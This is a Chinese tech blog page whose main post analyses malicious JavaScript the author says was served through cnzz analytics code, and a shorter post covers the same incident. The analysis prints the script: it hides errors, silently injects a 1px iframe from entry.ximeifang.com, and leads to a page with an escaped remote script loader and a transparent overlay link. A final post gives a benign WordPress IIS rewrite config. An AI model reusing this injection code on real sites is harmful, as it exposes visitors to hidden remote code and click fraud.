ximeifang 恶意软件病毒揭秘
作者:admin 日期:2017-03-27
困扰了很多天的ximeifang.com恶意软件病毒问题终于搞清楚了,从开始怀疑cnzz到后来怀疑联通dns劫持,到现在确认是cnzz自己放的木马,过程还真是曲折。。。
木马表现:chrome浏览器下会提示
您要访问的网站包含恶意软件
攻击者可能会试图通过 entry.ximeifang.com 在您的计算机上安装危险程序,以窃取或删除您的信息(如照片、密码、通讯内容和信用卡信息)。
木马来源:CNZZ官方。。。震惊。。。
代码如下:
http://c.cnzz.com/core.php?web_id=统计id&show=pic1&t=z
JavaScript代码
- var u = "http://c.cnzz.com/core.php?web_id=统计ID&show=pic1&t=z";
- var wapp = 0.95;
- var pcp = 0.95;
- var serh = "entry.ximeifang.com:31002";
- window.onerror = function(a, b, c) {
- return true;
- };
- function IsPC() {
- var a = navigator.userAgent;
- var b = ["Android", "iPhone", "SymbianOS", "Windows Phone", "iPad", "iPod"];
- var c = true;
- for (var v = 0; v < b.length; v++) {
- if (a.indexOf(b[v]) > 0) {
- c = false;
- break
- }
- }
- return c;
- };
- function loadjs(a) {
- var c = document.createElement("script");
- c.setAttribute("type", "text/javascript");
- c.setAttribute("src", a);
- c.setAttribute("charset", "utf-8");
- document.getElementsByTagName("head")[0].appendChild(c);
- };
- function loadiframe(a) {
- var c = document.createElement("iframe");
- c.setAttribute("id", "wbifr");
- c.setAttribute("name", "wbifr");
- c.setAttribute("width", "1px");
- c.setAttribute("height", "1px");
- c.setAttribute("src", a);
- document.getElementsByTagName("head")[0].appendChild(c);
- };
- if (IsPC()) {
- if (Math.random() < pcp) {
- loadiframe("http://" + serh + "/fakepc");
- }
- } else {
- if (Math.random() < wapp) {
- loadiframe("http://" + serh + "/fakewap");
- }
- }
- if (u.indexOf("?") > 0) {
- u += "&aaa_flag=1"
- } else {
- u += "?aaa_flag=1"
- }
- loadjs(u);
访问fakepc则会跳转到:
http://niujv.com/
该网页源码:
XML/HTML代码
- <!DOCTYPE html>
- <html>
- <head>
- <body>
- <script>
- <!--
- document.write(unescape("%3Cscript%20src%3D%22http%3A//code1.168wss.com/page/%3Fs%3D11636%22%3E%3C/script%3E"));
- //-->
- </script>
- <img src="fr fc_9 mar.png" />
- <a href="http://www.niwodai.com/event.mhtml?artId=1823227138797576&f&utm_source=baidutz&utm_medium=cpc&cid=sem-bd03-test-dylc-380&nwd_ext_aid=3000001481188029&source_id=" target="_blank" style="width: 0px; height: 0px; position: absolute; top: 0px; left: 0px; background: #b2b2b2; filter:alpha(opacity=10); -moz-opacity:0.1; -khtml-opacity: 0.1; opacity: 0.1;"></a>
- <span style="display:none"><script src="https://s95.cnzz.com/z_stat.php?id=1261561746&web_id=1261561746" language="JavaScript"></script></span>
- <head>
- </body>
- </html>
又被嵌入了一层js。。。具体要干啥我也懒得分析了,反正不会是好事。。。
至此算是真相大白了,CNZZ的客服还说换https就不会被DNS劫持了。。。。
国内最大的流量统计服务商北京锐讯灵通科技有限公司。。。。
entry.ximeifang.com恶意软件病毒DNS劫持
作者:admin 日期:2017-03-24
Google chrome浏览器访问很多网站会提示恶意软件。所有出现提示的网站的共同特点是添加了cnzz的统计代码,本来怀疑是cnzz自己搞的,后来发现他们官网都有。。。最终确认是联通DNS劫持,这么多年了还是狗改不了吃屎,不过也可能是他们被黑了。。。
最新爆料:经过仔细分析,确认是CNZZ自己搞的,具体什么目的暂时还不清楚,但肯定是有黑幕!!!
请看我的分析:https://blog.guanjianci.net/article.asp?id=814
Wordpress - IIS伪静态规则
作者:admin 日期:2017-03-10
这是适用于IIS7及以上的Wordpress的伪静态规则,保存成web.config文件,放到网站根目录即可。
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<rewrite>
<rules>
<rule name="WordPress" stopProcessing="true">
<match url="^(.*)$" />
<conditions>
<add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" />
<add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" />
</conditions>
<action type="Rewrite" url="index.php" appendQueryString="true" />
</rule>
</rules>
</rewrite>
</system.webServer>
</configuration>
PHP通过iconv将字符串从GBK转换为UTF8编码
作者:admin 日期:2017-03-01
广告位
